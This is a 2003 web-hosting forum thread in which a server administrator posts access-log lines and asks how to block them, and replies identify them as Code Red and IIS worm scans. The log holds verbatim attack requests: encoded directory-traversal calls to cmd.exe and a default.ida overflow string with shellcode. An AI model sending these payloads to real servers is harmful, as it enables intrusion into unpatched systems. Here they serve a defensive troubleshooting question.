The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to stop this process?

Discussion in 'General Discussion' started by tekdns, Jun 15, 2003.

  1. tekdns

    tekdns Well-Known Member

    Joined:
    Jun 9, 2002
    Messages:
    100
    Likes Received:
    0
    Trophy Points:
    16
    Hi,


    How to stop/block these below process;

    "12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
    127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
    127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
    66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
    218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
    66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
    66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
    127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
    12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/

    ....................."

    Becouse, after these process, my server down.

    Thanks for your help

    cPanel.net Support Ticket Number:
     
  2. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    16
    This is code red
    try to search code red in this forums .

    cPanel.net Support Ticket Number:
     
  3. tAzMaNiAc

    tAzMaNiAc Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    559
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Sachse, TX
    Those processes havenothing to do with why your server went down. Those are windows machines looking to attack windows machines with the IIS vulnerabilities.

    Unless you are running IIS and some strange configuration (CPanel DOES Not run IIS :-D), this is not the problem..

    Brenden

    cPanel.net Support Ticket Number:
     
  4. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    It is possible that too many connection attempts were coming in too fast, creating a 'mini' DDOS attack. A brief look showed double-digit attempts per second.

    Do a search on this forum for 'sumthin' as there is some good information in one of the posts about what to do in these type situations.

    cPanel.net Support Ticket Number:
     
Loading...

Share This Page